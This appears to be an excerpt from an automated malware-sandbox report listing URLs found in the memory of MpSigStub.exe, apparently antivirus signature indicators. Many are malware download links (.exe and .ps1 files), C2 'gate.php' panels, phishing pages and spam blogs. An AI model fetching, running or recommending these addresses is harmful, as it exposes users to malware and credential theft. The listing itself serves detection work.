Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://bangash-free-soft.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://bani-pe-net-cum-sa-faci-bani.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6346395336.0000028BC3EC7000.00000004.00000001.sdmp	String found in binary or memory: http://bannercpm.com/bc
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://bar-refaeli-online.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://barely-art.com/wp-content/themes/pennews/languages/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://barrefaeli-hot.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://bbc.lumpens.org/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://bcoolapp.com
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://beautybrief.com/c/gate.php
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://beef.smmovefilehost.com/pc/page/set_reg.php?afc=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://bellasimpson.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://berkah2013.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://beruijindegunhadesun.com/ktmcheck.exe
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://best-search.us
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://best4hack.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1http://rezultsd.info/cd/cd.php?id=%s&ver=ig1http://carren
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=ERROR&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bestnyaduit.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://bestofthebesttatoo.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://bestoneoffour.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://bestsoll.com/forum/go.php?sid=2
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://besttechforum.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://besttoolbars.net/af_analytics
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bestwebtips.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://beutiful-girl-fuck-moviepp.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://bfb3c.21a8b.j4fbs.k876c575n.v48796e.f5.nbdc.y7.v2da8e4kt.drovemeetings.in/
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: http://bgtc.pctonics.com
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://bhngvfcdswqwertyuiopasdfghjkllkjhgfdsapo.ydns.eu/srvhost.doc
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://biancavoguel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://bibliaamada.org/counter.php
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://bibliotecasgc.bage.es/cgi-bin/koha/tracklinks.pl?uri=https://huerm-brib-0b902c.netlify.app#ke
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://big-boobs-nude.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://bigboobsp.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://bigdeal777.com/gate.php?f=
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bikerboyz11.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://bilakubercakap.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitelkincd.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitemizligi.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://billpay-center.com/post/506pblpks.exe
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://binnenspegel.fryslan.intern/ofdielingen/iv/ict/projecten/docbaseq32014/documenten/forms/templ
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://binni-ks.com/modules/dashgoals/binni.htm)
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://bintai.com.sg.oliverboeckel.com/zgf2ev9zdwlaymludgfplmnvbs5zzw==
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://binyousafindustries.com/fonts/jo/mops.exe
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://bis.180solutions.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bisersables.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2er
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2fy
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2h9
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2pe
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2tt
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq3ed
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqksy
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fql9f
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqlxg
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqm5f
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmag
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmin
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnfa
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnzq
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqrh4
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv6g
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv8b
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwam
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwdq
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxt8
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx3
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx8
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyco
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqycs
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyh6
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyha
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhe
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhk
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzi9
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzim
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmn
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmv
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzr4
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzt3
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqztv
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/1r9mffb)
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/28jsjnq)
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/29vi7ez)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cobwhj)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cokxeu)
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cqkvnc)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2df4jbx)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2h3fi0m)
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2hload25ydu19
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2jg4gfn)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2kud4md)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2p8qtra)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2q93tca)
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://bittupadam.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://bitzroid.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bjphplegal.org/wp-admin/script/)/s/uri
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://black43.ars.0manko.jp/set_inf.php?id=movies.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://blackhole.ddnsgeek.com:8088
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/gate
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/success
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://blacksun.phpnet.us/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://blackterias.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://blank-record.com/cgi-bin/search?id=
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://blessedindia.org/9ifuurhgwq
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://bln8225.casacam.net/zxqjhjubakff/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-ilmu10.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-misteri.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://blog-rye.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://blog.daum.net/ahahvideo
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://blog.eduadda.in/wp-content/themes/twentythirteen/get.php?id=
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: http://blog.x-row.net/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://blogcliphai.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bloggersiput.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://bloggiaitribg.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://bloghumortododiablog.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://blogketoanthue.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://bloglistcorner.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://blogluyoruz.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://blogphimhay41.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://blogsemasacaparnab.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://bloodcrypt.com/info/info.txt
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://bloodybits.com/edwinjefferson.com/ie_xo/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://blufda.com/
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://bnpost.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://bogle.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bollyinthon.com/docusign/doc/home/index.php)
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://bonkersmen.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://bonzo.lublin.pl/help/helpNEW.exe
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://book4u-free.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://booknology.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://boomdakai.tk/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bootreading.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://bopdu.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://bornforthis.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bornonthescene.com/purchase/kill.php?ten=fingers)
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://boscumix.com/optima/index.php
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bosengaptek.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://boss.orda.icu/mailb.php
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	String found in binary or memory: http://bot.cjfeeds.com
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bousalemfoot.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://brazzerslove.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/1.dat
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/2.dat
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/doc.xls
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://brilhosefascinios.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: http://brokentools.xyz/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://brotherunited.cf/.start/yxblcmv6qgnhcm5pdmfslmnvbq==
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://browsetosave.info
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://bsskillthdyemmulatorsdevelovercomun6bfs.duckdns.org/document/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://bugs.clamav.net
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://buildwith307.com?
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://bukankeranaakutakcintafull.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://busco-mujeres.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://businesswebapp.com/realtors/wp-admin/js/jb/login%20pdf.html)
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://butterchoco.net/admin/bull/gate.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://buy.haote.com/?
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://buydomainnameuk.com/img/pole.exe
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://bytecoin.tk/m/svchosts.exe
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://c2quocoaidateh.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://c4.faceb00k.com:8888/files/run2.ps1
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://caferestaurantnador.com/wp-includes/0onjp/
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://calastargate.net/y82rtzbz.php?id=1484429
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://calendar.cjishu.com/index.php
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://californianlondon.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://calleveinte.com.mx/ups-quantum-view
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://calux123.blogspot.com/
